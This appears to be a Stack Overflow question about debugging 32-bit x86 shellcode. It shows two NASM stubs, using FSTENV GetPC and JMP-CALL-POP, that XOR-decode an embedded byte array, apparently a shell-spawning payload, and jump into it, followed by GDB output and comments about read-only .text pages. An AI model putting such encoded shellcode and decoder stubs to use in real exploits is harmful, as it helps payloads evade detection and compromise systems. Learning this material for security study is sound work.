Segmentation Fault ShellCode

Question

I have been trying to create a shellcode which takes a XOR encoded shellcode using FSTENV GetPC techniquec, decodes it and passes control to it. The code is :

global _start
section .text 
_start:

        fldz
        fstenv [esp -0xc]
        pop esi
        add esi , 0x11

decode:
        xor byte [esi] , 0xAA
        jz Shellcode
        inc esi
        jmp short decode


    Shellcode : db 0x9b,0x6a,0xfa,0xc2,0xc8,0xcb,0xd9,0xc2,0xc2,0xc8,0xc3,0xc4,0x85,0xc2,0x85,0x85,0x85,0x85,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,0xaa

This Code has is based off another similar code which I wrote :

global _start
section .text
_start:
        jmp short call_decoder
decoder :
        pop esi
decode:
        xor byte [esi] , 0xAA
        jz Shellcode
        inc esi
        jmp short decode
call_decoder:
        call decoder
        Shellcode : db 0x9b,0x6a,0xfa,0xc2,0xc8,0xcb,0xd9,0xc2,0xc2,0xc8,0xc3,0xc4,0x85,0xc2,0x85,0x85,0x85,0x85,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,0xaa

Now when compiled and executed using nasm both of them result in SEGMENTATION FAULT. How ever when used in a C program the first one doesn't seem to work and results in SEGMENTATION fault while the second one works just fine.

Also, analysis with GDB shows that in the first one the error occurs at the XOR statement. GDB output is as follows :

Program received signal SIGSEGV, Segmentation fault.
Dump of assembler code from 0x804806b to 0x8048075:
=> 0x0804806b <decode+0>:       xor    BYTE PTR [esi],0xaa
   0x0804806e <decode+3>:       je     0x8048073 <Shellcode>
   0x08048070 <decode+5>:       inc    esi
   0x08048071 <decode+6>:       jmp    0x804806b <decode>
   0x08048073 <Shellcode+0>:    fwait
   0x08048074 <Shellcode+1>:    push   0xfffffffa
End of assembler dump.
0x0804806b in decode ()

Hook-stop is defined as :

disas $eip, +10

And meanwhile ESI points to the first to the first byte of the shellcode [as expected ?]

(gdb) x/xb $esi
0x8048073 <Shellcode>:  0x9b

The Commands used to create the executable are :

nasm -f elf32 -o <Linker Object> <Nasm File>
ld -o <Executable Name> <Linker Object>

So where is the first code going wrong and how do I rectify it ?

PS : I used a reference from Here

Use the debugger to verify that `[esi],0xaa` points to a valid memory address. — paulsm4, Sep 19 '20 at 22:17
`.text` section is read-only by default. Make it writable. You did not show the commands you used to produce the executable. — Jester, Sep 19 '20 at 22:23
@paulsm4 as I said, $esi points to the first byte of the shellcode. — WhoKilledDB, Sep 20 '20 at 05:53
@Jester I added the details. Also I know the `.text ` section is not writeable and the segmentation fault is expected to happen but the shell code when fed into a C program , the first one doesn't work but the second one does ! — WhoKilledDB, Sep 20 '20 at 06:06
Clearly once you fixed the RWX page permissions bug, the first one had some other bug that also led to a crash. You only posted machine code, not disassembly. Use a debugger to find the crash in the one that doesn't work, and debug it. — Peter Cordes, Sep 20 '20 at 13:11

Segmentation Fault ShellCode

0 Answers0